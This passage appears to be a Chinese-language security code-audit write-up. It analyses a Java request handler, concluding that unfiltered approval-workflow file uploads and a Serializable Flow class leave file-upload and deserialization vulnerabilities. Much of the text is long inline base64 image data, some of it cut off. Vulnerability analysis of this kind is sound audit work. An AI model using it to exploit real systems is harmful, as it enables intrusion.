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
<p blockindex=9><strong>分析</strong>：我们先分析从65-83行的内容，该部分就是先后创建了以一个实体类<code>DecryptionApp</code>,一个List列表，一个实体类<code>DecryptionAppResp</code>，之后从前端传过来的数据<code>request</code>利用<code>getXMLFromRequest</code>方法提取XML格式的字符串数据并利用<code>fromXML</code>其将转换为一个<code>DecryptionApp</code>对象将其赋值给<code>dec</code></p>
<p blockindex=10>接着分析84-109行</p>
<p blockindex=11><img src="data:image/png;base64,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
<p blockindex=12><strong>分析</strong>：先后创建了<code>Flow</code>和<code>FlowDetail</code>的实例化对象，这两个类都继承了<code>Serializable</code>接口，之后获取dec的<code>UserName</code>和<code>Files</code>的值并且设置了<code>APPDate</code>,接着判断list参数是否为空，不为空就是进入for循环中。该for循环中处理了与审批流程相关的文件上传(即list列表中的内容)，它检查文件是否重复，若存在这向前端发送相关的XML数据，若不存在就构建出文件路径和列表字符串。</p>
<p blockindex=13><img src="data:image/png;base64,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
<p blockindex=14>该代码并没有对前端的数据进行任何的过滤只是进行了简单的数据库查重，这就触发了我们的文件上传漏洞，同时这个Flow类继承了Serialization的接口存在反序列化漏洞</p>
<p blockindex=15>接着从111-270行，因为内容太多并且对我们的漏洞利用没有太大作用我们就简单说一下，这段代码就是处理了工作流(Flow)相关的审批流程包括了审批者的确定、审批级别的分配以及审批状态的初始化</p>
<p blockindex=16><img src="data:image/png;base64,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
<p blockindex=17>接着就是到265-297代码的分析</p>
<p blockindex=18><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABPwAAARICAIAAAAZBFjCAAAgAElEQVR4nOzdZ0AUV9cH8DO0XTossEjv0kQQAUGjxt7RKJZo7KLGaDQmsUSjidEomlhi7NHXKPbuIzbEQkRsICJFQUDK0qVJb/N+oK8L7CqK4v/3iZ25c++ZO7PLnr13Zpi8vDyqwbIVr14EB0Xnyht1cmzPk2MYqodl2VfPA+7GVeh2cuugJVddPvbBvZginU49OmhJs2xFUU7mq9L6G5WlR0ekyFh81sVYoWFtHzJlZeXw8HAisrW1be1YmpKSkkJEOjo6rR0IAAAAAADAB0qm/ovyjIjg6OxyLl+Tm5+SkF+7XE5NV0dVlmEYZSMrvdRHgpC7Rbo6GgpMaW6aIL1AVtPWTFOKiBhGWkFdW6FehSxbVPiCiH1POwMAAAAAAABQX8Okt7CojGGoJCMuKqP+cmVzTR1VWSJi5DStXZyVY2OTMpJiUyplucpa5p0sjDTlP55RXAAAAAAAAPh0MPWnN0MVTG8GAAAAAABoG6RaOwAAAAAAAACAdwVJLwAAAAAAALRZSHoBAAAAAACgzULSCwAAAAAAAG0Wkl4AAAAAAABos5D0AgAAAAAAQJuFpBcAAAAAAADaLCS9AAAAAAAA0GYh6QUAAAAAAIA2C0kvAAAAAAAAtFlIegEAAAAAAKDNQtILAAAAAAAAbRaSXgAAAAAAAGizkPQCAAAAAABAm4WkFwAAAAAAANosJL0A8DEoTPD3Xv/dtoDS1g4EWoyIY1oasO279d7+iYVNbCZOGQAAAIA6S